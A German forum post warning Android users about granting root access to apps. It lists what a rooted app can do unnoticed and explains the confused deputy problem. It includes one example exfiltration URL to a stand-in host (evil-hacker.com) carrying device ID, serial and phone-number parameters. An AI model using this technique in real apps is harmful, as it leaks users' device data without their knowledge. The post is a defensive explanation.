Ich habe jetzt etwas gezögert, aber um ganz sicher zu gehen, beschreibe ich uns nochmal
Das Problem mit einer beliebigen Root-App in Stichpunkten:
- Voraussetzung ist ein gerootetes Phone (su binary ist installiert, klar) - Also unsere Defy-CM-ROM
- Mit SuperSU (der App) - oder dem Superuser unter CM - kontrolliert man die Zugriffe auf die su binary durch eine Root-App (User-Anfrage)
- Wenn man der Root-App dann root-Zugriff gewährt, kann diese UNKONTROLLIERT u. a. folgende Aktionen durchführen:
- ALLE Daten ALLER Apps lesen, schreiben, löschen
- Apps programmatisch und Dateien inhaltlich ändern (z. B. Funktionen ändern, Viren/Trojaner injizieren, Fake-Hosts in die hosts-Datei schreiben, Spuren verwischen, Logs löschen etc.)
- Sich selbst über iptables (auch nur temporär) Zugang zum Internet verschaffen (auch ohne, dass eine Firewall-App das merkt/verhindern kann)
- Eine Schnittstelle aktivieren (WiFi, Mobile Daten, Bluetooth, NFC etc.)
- Dadurch beliebige ausgelesene Daten irgendwohin versenden
- Kontroll-Befehle aus dem Internet erhalten (Malware wird nachgeladen und installiert)
Alle diese Aktionen können ohne weiteres auf dem Phone unbemerkt im Hintergrund ablaufen (z. B. nachts oder bei Screen off).
(Das Argument "Google überprüft alle Apps" lasse ich insofern nicht gelten, weil es bereits viele Zwischenfälle gab und auch der Google Play Store zwar relativ sicher, aber eben nicht ganz sicher ist. - Bei der Anzahl der dort verwalteten Apps ist es schon zeitlich unmöglich alles zu checken und zu finden.)
Deswegen
- vergibt man einer Root-App nicht permanent die Root-Berechtigung (AFWall+ ist eine Ausnahme)
- friert man eine nur selten genutzte Root-App nach der Nutzung wieder ein oder deinstalliert diese wieder
- benutzt man so wenig Root-Apps, wie nur möglich auf dem Phone
- untersucht man eine Root-App auf deren Verhalten/liest sich schlau im Internet
- installiert man eine (Root-)App beim geringsten Zweifel/Misstrauen erst gar nicht
- versucht man, (Root-)Apps zu installieren, zu denen der Source-Code verfügbar ist (selber kompilieren)
___
Auch ungerootet und mit "normalen" Apps (auch ohne internet-Berechtigung) können Daten herausgeschmuggelt werden.
Das geht z. B. mit dem Konzept des "Confused Deputy Problem", bei dem eine rechtelose App einfach einen Intent einer anderen App ausnutzt.
Ein Beispiel ist das Öffnen einer Webseite durch den entsprechenden Intent des Browsers (das ist dann der confused deputy), der ja in das Internet darf.
Dabei werden einfach die zu übertragenden Daten an den URL angehängt:
http://evil-hacker.com/blackbox.send?deviceid=<DEVICEID>&serialno=<SERIALNO>&phonenumber=<PHONENUMBER>
Der Browser denkt sich nichts dabei, öffnet "gerne" den von der App übergebenen URL und übergibt so die darin enthaltenen Daten an den Web-Server. - Der neue Besitzer der Daten freut sich über die Einnahmen daraus ...
(Auch das kann im Hintergrund stattfinden, ohne dass der Browser/dessen GUI geöffnet werden muss.)
Ein weiteres Beispiel ist der beliebte
ES File-Explorer: Macht alles, kann alles, ist einfach genial.
Mein Problem mit der App: Man vergibt root, die App lernt mit der Zeit alle möglichen Accounts (Benutzername/Passwort) für LAN (FTP, SMB, SSH) und die Clouds (Google, Dropbox etc.) UND verbindet sich zyklisch mit
Baidu (chinesisches
Amazon/Google) und irgendeiner IP in der chinesischen Provinz (laut DNS). - Das dann vorgeblich für Checks auf Updates. - Ah, ja. - Tjoa ...
___
Wie man sieht, hat man einfach keine wirkliche Kontrolle und muss immer die Augen aufhalten und so wenig Apps installieren, wie nur möglich (Apps können sich bereits bei der nächsten Aktualisierung auch negativ verändert haben).
Wer das alles nicht so sieht (
@Netbook & friends ), kann das natürlich anders praktizieren - Ich habe kein Problem damit.